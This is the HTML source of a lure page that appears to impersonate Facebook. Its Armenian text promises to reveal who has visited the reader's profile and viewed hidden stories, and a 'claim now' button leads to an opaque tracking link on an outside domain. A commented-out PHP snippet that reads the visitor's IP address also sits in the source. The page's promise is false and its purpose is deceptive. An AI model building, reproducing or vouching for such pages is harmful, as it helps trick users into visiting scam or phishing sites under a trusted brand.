<html><head>
        <title>
who visited your profile       </title> 
         <!-- Favicons -->
         	<meta property="description" content="who visited your profile">

        <link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css">
        <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@200;300;400;600;700&amp;display=swap" rel="stylesheet">
<link rel="stylesheet" href="build/css/intlTelInput.css">

<!-- Google Fonts -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&amp;display=swap">
<!-- Bootstrap core CSS -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.4.1/css/bootstrap.min.css" rel="stylesheet">
<!-- Material Design Bootstrap -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.15.0/css/mdb.min.css" rel="stylesheet">
<!-- JQuery -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<!-- Bootstrap tooltips -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.4/umd/popper.min.js"></script>
<!-- Bootstrap core JavaScript -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.4.1/js/bootstrap.min.js"></script>
<!-- MDB core JavaScript -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.15.0/js/mdb.min.js"></script><style type="text/css">/* Chart.js */
@-webkit-keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}@keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}.chartjs-render-monitor{-webkit-animation:chartjs-render-animation 0.001s;animation:chartjs-render-animation 0.001s;}</style><style type="text/css">/* Chart.js */
@-webkit-keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}@keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}.chartjs-render-monitor{-webkit-animation:chartjs-render-animation 0.001s;animation:chartjs-render-animation 0.001s;}</style>
 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
 <link rel="stylesheet" href="styles.css?">
       <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@300&amp;display=swap" rel="stylesheet"> 
       <link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png">
   	<meta property="og:locale" content="ar_AR">
	<meta property="og:type" content="website">
	<meta property="og:title" content="who visited your profile">
	<meta property="og:description" content="who visited your profile">
	<meta property="og:url" content="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png">
	<meta property="og:site_name" content="  ">
		<meta property="og:image" content="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png">
				<link href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png" rel="icon" sizes="16x16" type="image/png">


 <style>
    
.fb {
    background-color: #1877F1;
    color: #fff;
    font-size: 18px;
    line-height: 28px;
}
.fb:hover{color:#fff;}
.img-thumbnail{background-color: transparent !important;
    border: 1px solid transparent !important;
width: 350px !important;}
.texttopen {
    margin-top: 0;}
 </style>
  <style>
     body{background:#fff;}
     p,.titlename {
    color: #000;
}
.texttopen{background: #fff !important;}
footer.page-footer .footer-copyright{background-color: #fff !important;}
.btn-success{background-color:  !important;}
footer{bottom: 0;
position: absolute;
width: 100%;}
 </style>
    </head>
    
    <body>
<section class="main">

          

      <div class="d-flex align-items-center justify-content-center">
        <div class="p-2 bd-highlight col-example">
        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/600px-Facebook_f_logo_%282019%29.svg.png" Width="30%" class="img-thumbnail" alt="..."></div>
        
            </div>
            <div class="d-flex align-items-center justify-content-center">
       <center> <div class="p-2 bd-highlight col-example titlename"><h4>ովքեր այցելել են ձեր պրոֆիլը</h4></div>
</center>
</div>
 <center>

                    
       <!-- Button trigger modal -->
<a href="https://gokaa.xyz/795/f/?p=fbm&s=c50219f2a6323751b0c477c5850c93893d578090f066d43d25c52e739b3901a13c2674fc68f1b8ee68e0696c43b4928b4d4dc592cf629e616478f32b6e670438&id=2262"><button type="button" style="background:#0c56d0 !important" class="btn btn-primary waves-effect waves-light">Պահանջեք հիմա </button></a>




       </center>
       
       
       

          </section>
            <div class="container texttopen">
  <div class="container texttopen">
   <center> <div class="col col-xl"><p style="text-align:center;">այժմ կարող եք տեսնել այն ցուցակը, թե ովքեր են վերջերս այցելել ձեր պրոֆիլը և դա ձեզ չի ցուցադրվում կարող եք նրանց հաղորդագրություն ուղարկել և նաև կարող են Թաքնված պատմությունը դիտողներին</p></div></center>
  </div>
</div>


<!-- Footer -->
<footer class="page-footer font-small" style="margin-top:25px;background-color:#0000004d !important;">

 

  
  <!-- Copyright -->

</footer>
<!-- Footer -->





<!--
function getUserIP()
{
    // Get real visitor IP behind CloudFlare network
    if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
              $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
              $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
    }
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}


$user_ip = getUserIP();

echo $user_ip;?>
--><div class="hiddendiv common"></div></body></html>
